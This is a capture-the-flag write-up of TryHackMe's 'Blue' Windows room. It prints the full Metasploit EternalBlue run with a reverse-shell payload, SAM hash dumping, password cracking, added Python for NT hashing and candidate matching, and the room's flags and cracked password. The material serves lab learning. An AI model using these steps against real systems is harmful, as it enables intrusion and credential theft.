THM – Blue CTF Room
This CTF challenge room is hosted by the team over at TryHackMe; it'll take us from recon, through exploitation and privilege escalation of the Windows box, to flag finding. We'll be using nmap, Metasploit, the EternalBlue exploit module, the Windows registry, hashdump and a few other tools.
The room’s description is ‘Deploy & hack into a Windows machine, leveraging common misconfigurations issues.’
Task 1) Recon
Q) How many ports are open with a port number under 1000?
Let’s run a quick nmap command, with a few switches that may be useful for later too.
sudo nmap 10.10.170.191 -sV -sC -O -Pn -p-1000 | tee nmap.txt
-sV for establishing service versions.
-sC for running the default scripts.
-O for OS detection (we're expecting Windows, obviously).
-Pn to skip the ping probe that determines whether the host is up (we're told it won't respond).
-p-1000 to scan only the first 1000 ports.
The response:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 03:55 EST
Nmap scan report for 10.10.170.191
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/14%OT=135%CT=1%CU=30073%PV=Y%DS=2%DC=I%G=Y%TM=61E13B
OS:26%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M
OS:505NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m51s, median: -1s
| smb2-time:
| date: 2021-01-14T08:58:07
|_ start_date: 2021-01-14T08:42:47
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:e0:73:3d:1c:cd (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-01-14T02:58:07-06:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.16 seconds
Q) How many ports are open with a port number under 1000?
A) 3
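To make the port count reproducible rather than eyeballed, here is a small parser, added for this writeup and not part of the TryHackMe room or the author's original notes, that pulls the open ports and the SMB host-script findings out of saved nmap output. The sample text is constructed from the two scan results above (trimmed to the lines the parser needs); the function names are my own.

```python
import re

# Constructed sample: lines lifted from the page's two nmap runs.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.170.191
Host is up (0.090s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_    message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

# "135/tcp   open  msrpc" -> port, protocol, state, service
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
# "| smb-vuln-ms17-010:" or "|_smb-vuln-ms10-054: false"
VULN_LINE = re.compile(r"smb-vuln-(ms\d{2}-\d{3}):\s*(.*)$")


def open_ports(text):
    """Return [(port, proto, service)] for every line nmap reports as open."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            found.append((int(m.group(1)), m.group(2), m.group(4)))
    return found


def count_open_below(text, limit=1000):
    """The Task 1 question: how many open ports have a number under `limit`."""
    return sum(1 for port, _, _ in open_ports(text) if port < limit)


def smb_findings(text):
    """Pull out the host-script facts a defender would act on: SMB signing
    state and any smb-vuln-* script that reported VULNERABLE."""
    lines = text.splitlines()
    findings = {
        "smb1_signing_disabled": any(re.search(r"message_signing:\s*disabled", l) for l in lines),
        "smb2_signing_required": any("Message signing enabled and required" in l for l in lines),
        "vulnerable_to": [],
    }
    for i, line in enumerate(lines):
        m = VULN_LINE.search(line)
        if not m:
            continue
        rest = m.group(2).strip()
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        # A positive result puts "VULNERABLE:" on the following line; a clean
        # result ("false") or an error (NT_STATUS_ACCESS_DENIED) stays on the same line.
        if rest == "" and "VULNERABLE" in nxt:
            findings["vulnerable_to"].append(m.group(1).upper())
    return findings


if __name__ == "__main__":
    print("open ports:", open_ports(SAMPLE_NMAP))
    print("open below 1000:", count_open_below(SAMPLE_NMAP))
    print("smb findings:", smb_findings(SAMPLE_NMAP))
```

Running it against the sample gives 9 open ports in total, 3 of them under 1000 (135, 139, 445), SMBv1 signing disabled, SMBv2 signing not required, and MS17-010 as the only positive smb-vuln result. The two signing flags are worth keeping in a real scan report: "enabled but not required" and "disabled (dangerous, but default)" are the settings that leave SMB open to relay and tampering even after the SMBv1 patch is applied.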
Next we're asked to identify the vulnerability on the server. We can do this again from nmap, using its built-in scripting engine (NSE).
Q) What is this machine vulnerable to?
(Answer in the form of: ms??-???, ex: ms08-067)
We can see from the question that the vulnerability is Microsoft-based ('ms'), and the obvious exposed service we previously saw was SMB. Combining those two facts narrows down which NSE scripts to run.
The scripts are all stored in /usr/share/nmap/scripts.
We can run this command to test all SMB-related scripts that cover MS bulletins:
$ sudo nmap 10.10.170.191 --script=smb*ms* | tee nmap_script_smb.txt
This quickly responds with:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 05:10 EST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.20% done; ETC: 05:11 (0:00:00 remaining)
Nmap scan report for 10.10.170.191
Host is up (0.090s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds
So we can see that the server is potentially vulnerable to the 2017 critical remote code execution vulnerability in Microsoft SMBv1 servers. This vulnerability is CVE-2017-0143 (MS17-010).
Q) What is this machine vulnerable to?
(Answer in the form of: ms??-???, ex: ms08-067)
A) MS17-010
With this question answered, Task 1 Recon is complete.
Task 2) Gain Access
So it looks like TryHackMe wants us to use Metasploit to gain access to this machine.
Use this command to fire up Metasploit
$ msfconsole
Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
We're then asked to find a module that can exploit the vulnerability discovered during the recon phase. So let's search for it:
msf6 > search "MS17-010"
If that output is too hard to read, here's a summary of the MS17-010 modules it returns:
Matching Modules
================
#  Name                                       Description
-  ----                                       -----------
0  exploit/windows/smb/ms17_010_eternalblue   EternalBlue SMB Remote Windows Kernel Pool Corruption
1  exploit/windows/smb/ms17_010_psexec        SMB Remote Windows Code Execution
2  auxiliary/admin/smb/ms17_010_command       SMB Remote Windows Command Execution
3  auxiliary/scanner/smb/smb_ms17_010         SMB RCE Detection
4  exploit/windows/smb/smb_doublepulsar_rce   Remote Code Execution
We can check out each module in more depth using the command info X (where X is the module # of the previous response).
If we look at the MS17_010_eternalblue module:
msf6 > info 0
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by: ...
Available targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
Check supported:
Yes
Basic options:
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT          445              yes       The target port (TCP)
SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.
References: ...
Also known as: ETERNALBLUE
Seems like a good place to start.
Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
A) exploit/windows/smb/ms17_010_eternalblue
Let’s use that exploit.
Q) Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
We can see from the options that this exploit has 4 required options, but 3 of them come pre-populated. The one value that can never have a default is the target host.
Q) Show options and set the one required value. What is the name of this value? (All caps for submission)
A) RHOSTS
So we best set that:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.170.191
RHOSTS => 10.10.170.191
TryHackMe then asks us to specify the payload:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
Then we can run the exploit:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.39.10:4444
[*] 10.10.130.233:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.130.233:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.130.233:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.130.233:445 - The target is vulnerable.
[*] 10.10.130.233:445 - Connecting to target for exploitation.
[+] 10.10.130.233:445 - Connection established for exploitation.
[+] 10.10.130.233:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.130.233:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.130.233:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.130.233:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.130.233:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.130.233:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.130.233:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.130.233:445 - Sending all but last fragment of exploit packet
[*] 10.10.130.233:445 - Starting non-paged pool grooming
[+] 10.10.130.233:445 - Sending SMBv2 buffers
[+] 10.10.130.233:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.130.233:445 - Sending final SMBv2 buffers.
[*] 10.10.130.233:445 - Sending last fragment of exploit packet!
[*] 10.10.130.233:445 - Receiving response from exploit packet
[+] 10.10.130.233:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.130.233:445 - Sending egg to corrupted connection.
[*] 10.10.130.233:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.130.233
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (10.8.39.10:4444 -> 10.10.130.233:49163 ) at 2021-01-14 06:04:14 -0500
Shell Banner:
Microsoft Windows [Version 6.1.7601]
And we get dropped into a Windows command shell (cmd.exe)!
Our foothold on the Windows box has been established.
Task 2 Troubleshooting
I and many others seem to get multiple issues when dropping the MS17-010 EternalBlue exploit onto the target.
I got dozens of FAIL messages.
Using the TryHackMe built-in Linux attack machine provided a more reliable connection, so try that (it still wasn't rock-solid though).
Task 3) Escalate
Now we’re on the box, can we escalate our privileges?
Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
So let's do a bit of research:
- [Metasploit]Upgrade Normal Shell To Meterpreter Shell – Infosecwriteups
- How to Upgrade Command Shell to Meterpreter – HackingArticles
- TryHackMe! EternalBlue/MS17-010 in Metasploit – John Hammond
Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
A) post/multi/manage/shell_to_meterpreter
If we use that module, we can re-run our options command to see which required field is left blank.
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit ...
LHOST no IP of host that ...
LPORT 4433 yes Port for payload to...
SESSION yes The session to run ...
We can see which sessions Metasploit has open currently:
Just the one, as expected.
Now we have the SESSION option set, let's run the module to upgrade the session to Meterpreter:
Eventually I had to resort to the THM built-in machine. Finally the payload allowed for the Meterpreter shell:
We were then able to execute ps and browse the current process list:
We could then migrate the cmd.exe process:
Task 4) Cracking
Now we’re really getting our teeth into the box.
Can we crack any of the local users' passwords?
Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.
What is the name of the non-default user?
As suggested by the challenge, let's use the hashdump command:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.
What is the name of the non-default user?
A) Jon
Okay Jon, how good is your password? We copy his hashdump line to a local file:
$ echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" >> jon.txt
Then we can run John the Ripper over it.
So Jon’s password is alqfna22
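The hashdump output above and the John result that follows it both come down to one format and one hash function, so here is a single worked example, added for this writeup and not part of the room or the author's notes, that parses the pwdump-style lines, triages them the way a defender reading a leaked SAM would, and reproduces the John result by hashing candidates. The MD4 implementation is my own pure-Python version of RFC 1320 (hashlib's md4 is missing on OpenSSL 3 builds without the legacy provider); the sample is constructed from the three lines above; the function names are assumptions.

```python
import struct

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the three hashdump lines from the page.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320): three rounds of 16 steps over 64-byte blocks."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl(a + f(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl(a + g(b, c, d) + X[order2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl(a + hh(b, c, d) + X[order3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password; no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text):
    """user:RID:LM:NT::: -> list of dicts; skips lines that do not fit."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def triage(rows):
    """Defender's read of a dump: which accounts are non-default (RID >= 1000),
    which carry the empty-password NT hash, and whether LM hashes are stored."""
    return {
        "non_default": [r["user"] for r in rows if r["rid"] >= 1000],
        "blank_nt": [r["user"] for r in rows if r["nt"] == EMPTY_NT],
        "lm_stored": [r["user"] for r in rows if r["lm"] != EMPTY_LM],
    }


def match_candidates(rows, candidates):
    """Hash each candidate once and look it up against every NT hash in the dump.
    Because NT hashes are unsalted this is all a wordlist run has to do."""
    table = {nt_hash(p): p for p in candidates}
    return {r["user"]: table[r["nt"]] for r in rows if r["nt"] in table}


if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_HASHDUMP)
    print(triage(rows))
    print(match_candidates(rows, ["password", "alqfna22"]))
```

triage() gives the summary the challenge is after: Jon is the only non-default account (RID 1000), both built-in accounts carry the empty-password NT hash, and no LM hashes are stored (every LM field is the blank-LM constant). match_candidates() is the whole reason John finishes so quickly: with no salt, one MD4 per guess covers every account in the dump at once, so password length and randomness are the only things standing between a dumped SAM and a cleartext password.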
Task 5) Find the flags
Flag1? This flag can be found at the system root.
Well, the system root for a Windows box is usually assigned to the drive letter C:\
C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.
Passwords are normally stored in the SAM database under the registry hives, so let's take a look over there.
After a bit of hunting around… I overthought this, the flag was found in the Config folder:
C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}
Flag 3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Again I massively overthought this location. It simply means in Jon’s Documents folder:
C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}
Blue CTF Badge Acquired
There we have it – the TryHackMe Blue room is completed.
Fairly straightforward, but the target box was rather annoyingly fragile. I rebooted that machine and my local Kali VM so many times.
Tools, scripts and commands used in exploiting this Windows box:
- nmap
- Metasploit
- MS17-010 / EternalBlue SMB exploit
- JohnTheRipper
- hashdump